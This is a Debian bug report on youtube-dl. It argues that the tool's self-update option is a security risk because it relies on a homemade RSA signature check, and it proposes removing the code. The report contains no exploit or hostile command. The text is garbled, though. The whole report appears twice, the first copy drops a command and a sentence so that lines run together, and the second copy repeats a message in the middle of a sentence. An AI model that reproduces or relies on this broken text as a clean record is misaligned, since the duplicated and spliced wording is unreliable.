Nicolas Braud-Santoni
2018-02-11 10:50:31 UTC
Package: youtube-dl
Version: 2018.01.27-1
Severity: important
Tags: security upstream jessie stretch buster sid
Hi,
youtube-dl ships a self-update mechanism, accessible through the `--update` option.
This mechanism seems (correctly) defunct on Debian systems, as it is gated by a
self-upgrade mechanism relies on a self-made (and quite possibly insecure)
function for checking RSA signatures:
https://github.com/rg3/youtube-dl/blob/a072a12e249525f002646a921f16e14f03231662/youtube_dl/update.py#L17-L28
I suggest entirely removing the defunct option and corresponding code.
Best,
nicoo
-- System Information:
Debian Release: buster/sid
APT prefers testing
APT policy: (900, 'testing'), (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 4.14.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages youtube-dl depends on:
ii dpkg 1.19.0.5
ii python3 3.6.4-1
ii python3-pkg-resources 38.4.0-1
Versions of packages youtube-dl recommends:
ii ca-certificates 20170717
ii curl 7.58.0-2
ii ffmpeg 7:3.4.1-1+b2
ii mpv 0.27.0-2+b3
pn phantomjs <none>
pn rtmpdump <none>
ii wget 1.19.4-1
youtube-dl suggests no packages.
-- no debconf information
Version: 2018.01.27-1
Severity: important
Tags: security upstream jessie stretch buster sid
Hi,
youtube-dl ships a self-update mechanism, accessible through the `--update` option.
This mechanism seems (correctly) defunct on Debian systems, as it is gated by a
$ youtube-dl --update
It looks like you installed youtube-dl with a package manager, pip, setup.py or a tarball. Please use that to update.
However, it is not obvious how reliable this check is, and upstream'sIt looks like you installed youtube-dl with a package manager, pip, setup.py or a tarball. Please use that to update.
self-upgrade mechanism relies on a self-made (and quite possibly insecure)
function for checking RSA signatures:
https://github.com/rg3/youtube-dl/blob/a072a12e249525f002646a921f16e14f03231662/youtube_dl/update.py#L17-L28
I suggest entirely removing the defunct option and corresponding code.
Best,
nicoo
-- System Information:
Debian Release: buster/sid
APT prefers testing
APT policy: (900, 'testing'), (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 4.14.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages youtube-dl depends on:
ii dpkg 1.19.0.5
ii python3 3.6.4-1
ii python3-pkg-resources 38.4.0-1
Versions of packages youtube-dl recommends:
ii ca-certificates 20170717
ii curl 7.58.0-2
ii ffmpeg 7:3.4.1-1+b2
ii mpv 0.27.0-2+b3
pn phantomjs <none>
pn rtmpdump <none>
ii wget 1.19.4-1
youtube-dl suggests no packages.
-- no debconf information